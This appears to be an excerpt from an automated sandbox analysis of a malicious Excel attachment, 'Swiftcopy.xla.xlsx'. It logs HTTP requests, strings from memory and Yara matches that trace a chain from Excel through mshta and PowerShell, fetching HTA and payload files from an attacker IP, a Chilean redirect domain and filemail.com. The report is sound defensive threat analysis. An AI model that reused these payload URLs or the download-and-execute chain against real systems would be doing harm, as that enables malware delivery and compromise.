      Source: global trafficHTTP traffic detected: GET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1343/erg/seemebestthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.29Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1343/erg/seemebestthings.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.123.29If-Range: "320bd-627df8e9c34e4"
      Source: global trafficHTTP traffic detected: GET /1343/seemebestthingswithentirethingswithgreatnaturethings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.29Connection: Keep-Alive
      Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89997018 URLDownloadToFileW,8_2_000007FE89997018
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2E61FF1.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1343/erg/seemebestthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.29Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1343/erg/seemebestthings.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.123.29If-Range: "320bd-627df8e9c34e4"
      Source: global trafficHTTP traffic detected: GET /1343/seemebestthingswithentirethingswithgreatnaturethings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.29Connection: Keep-Alive
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: ljg.cl
      Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
      Source: mshta.exe, 00000004.00000003.500943602.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.0000000004433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/
      Source: mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.hta
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.hta...A
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htab
      Source: mshta.exe, 00000004.00000003.500717687.0000000003515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htahttp://172.245.123.29/1343/erg/seemebestthings.hta
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htai
      Source: mshta.exe, 00000004.00000002.501048315.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501030236.000000000037E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htarracks=drunk&kettledrum=flippant&banana=loose&bath
      Source: mshta.exe, 00000004.00000002.501048315.00000000003E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.00000000003E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/erg/seemebestthings.htas=drunk&kettledrum=flippant&
      Source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seeme
      Source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF
      Source: powershell.exe, 00000008.00000002.528531884.000000001AA9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFGf
      Source: powershell.exe, 00000008.00000002.528531884.000000001AA9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFHf
      Source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFp
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: powershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrz
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528531884.000000001AABE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001ACEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: powershell.exe, 0000000F.00000002.536446147.000000001AC84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
      Source: powershell.exe, 00000008.00000002.519013010.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: powershell.exe, 00000008.00000002.519013010.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.538964399.000000000240B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.533779674.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: powershell.exe, 0000000F.00000002.533779674.00000000025C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
      Source: powershell.exe, 0000000F.00000002.533779674.00000000025C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: mshta.exe, 00000004.00000002.501048315.0000000000423000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ljg.cl/
      Source: mshta.exe, 00000004.00000002.501048315.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.000000000040B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501030236.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, Swiftcopy.xla.xlsx, 73B30000.0.drString found in binary or memory: https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bat
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ljg.cl/P
      Source: mshta.exe, 00000004.00000002.501048315.0000000000423000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ljg.cl/ersiM
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ljg.cl/w
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownHTTPS traffic detected: 152.231.117.86:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.231.117.86:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: Process Memory Space: powershell.exe PID: 3044, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 2036, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Excel sheet contains many unusual embedded objects
      Source: Swiftcopy.xla.xlsxOLE: Microsoft Excel 2007+
      Source: Swiftcopy.xla.xlsxOLE: Microsoft Excel 2007+
